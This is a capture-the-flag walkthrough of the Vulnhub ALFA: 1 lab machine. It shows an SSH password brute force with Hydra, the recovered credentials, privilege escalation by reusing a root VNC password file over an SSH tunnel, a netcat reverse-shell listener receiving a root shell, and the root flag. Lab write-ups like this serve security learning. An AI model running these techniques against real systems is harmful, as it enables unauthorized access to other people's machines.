Vulnhub: ALFA: 1
ALFA: 1
This is ALFA: 1 from Vulnhub. It’s rated as Medium, and appears on the NetSecFocus Trophy Room list.
I had been doing the DriftingBlues series; I’d done 7 and 6 then the privesc on 5 was like super CTF-ish and I was like meh and then I started 4 and it was multiple base64 encoded strings and some nonsense I was like nah I’m done with this son. Anyway, Alfa.
Ports
This box has FTP, HTTP, SMB and SSH on a non-standard port.
FTP
We’ve got anonymous access and find a username; thomas. We get a picture of a dog, and we can’t put anything. Moving on.
Dog picture
I try exiftool and stegseek; nothing. The filename is milo.jpg.
HTTP
In robots.txt we have this:
/home
/admin
/login
/images
/cgi-bin
/intranet
/wp-admin
/wp-login
And most of these things don’t exist. At the very bottom, we have this:
++++++++++[>+>+++>+++++++>++++++++++««-]»+++++++++++++++++.»—.+++++++++++.——.—–.«–.»++++++++++++++++++.++.—–..-.+++.++.
And if you go here you can find out that points to /alfa-support.
If we go there, we get this:
◈Thomas:➤Hi! I am Thomas Miller, employee number 300197 ✔✔
◈Alfa IT Support:➤Good morning! nice to greet you Thomas, ¿How can help you? ✔✔
◈Thomas:➤I have a problem with my password, I partially forgot it, I only remember that it is the name of my pet followed by 3 numerical digits. Could you reset my password? ✔✔
◈Alfa IT Support:➤With pleasure Thomas, in a maximum of 24-48 hours you will receive an SMS on your corporate phone with your new temporary password, which you will have to change later. regards. ✔✔
Righto. So the name of the pet is milo (we assume) and the numbers are presumably between 100 and 999. I generate a wordlist with python and feed it to Hydra:
hydra -l thomas -P ./passwords ssh://192.168.1.65:65111
And we get a hit:
thomas:milo666
Privesc
We can SSH in as thomas; now what? Linpeas shows:
root 486 0.0 3.2 128952 47808 ? S 11:31 0:00 /usr/bin/Xtigervnc :1 -desktop Alfa:1 (root) -auth /root/.Xauthority -geometry 1900x1200 -depth 24 -rfbwait 30000 -rfbauth /root/.vnc/passwd -rfbport 5901 -pn -localhost -SecurityTypes VncAuth
That’s Xtigervnc running as root. It’s on port 5901:
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
In our home directory, we have:
4,0K -rwxrwxrwx 1 root root 16 dic 17 23:35 .remote_secret
Now I wasn’t familiar with any of this before, so this was a nice learning experience. I installed tigervnc-viewer on my Kali:
apt-cache search vncviewer
tigervnc-viewer - Virtual network computing client for X
apt install tigervnc-viewer
And set up an SSH port forward:
ssh -p 65111 -L 5901:localhost:5901 thomas@192.168.1.65
Now; I was guessing the .remote_secret file (owned by root) was some sort of credentials, so I copied it over to my machine. I also ran vncpasswd on the server and checked that the created file (/home/thomas/.vnc/passwd) looked similar to the .remote_secret file; it did.
To start tigervnc-viewer from the command line with a specified password file we use this syntax:
┌──(root💀kali)-[/opt/vulnhub/alfa]
└─# vncviewer -passwd .remote_secret
TigerVNC Viewer 64-bit v1.11.0
Built on: 2021-03-22 21:21
Copyright (C) 1999-2020 TigerVNC Team and many others (see README.rst)
See https://www.tigervnc.org for information on TigerVNC.
Tue May 11 06:00:50 2021
DecodeManager: Detected 2 CPU core(s)
DecodeManager: Creating 2 decoder thread(s)
CConn: Connected to host 127.0.0.1 port 5901
CConnection: Server supports RFB protocol version 3.8
CConnection: Using RFB protocol version 3.8
CConnection: Choosing security type VncAuth(2)
CConn: Using pixel format depth 24 (32bpp) little-endian rgb888
CConnection: Enabling continuous updatesAnd separately, we get root in a TigerVNC session. Apparently I can’t copy and paste from there (grrr) so I’ll send myself a shell just to prove it really happened:
──(root💀kali)-[/opt/vulnhub/alfa]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.65] 34774
root@Alfa:~# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) grupos=0(root)
Alfa
mar may 11 12:44:33 CEST 2021
root@Alfa:~# cat /root/root.txt
cat /root/root.txt
root_flag==>> QFqy4EUHwtu9rrrVe2T27we5W
# etcYeah you can probably copy and paste from there if you can be bothered to figure out how; I can’t. Anyway this was pretty good and I learned some stuff so yay!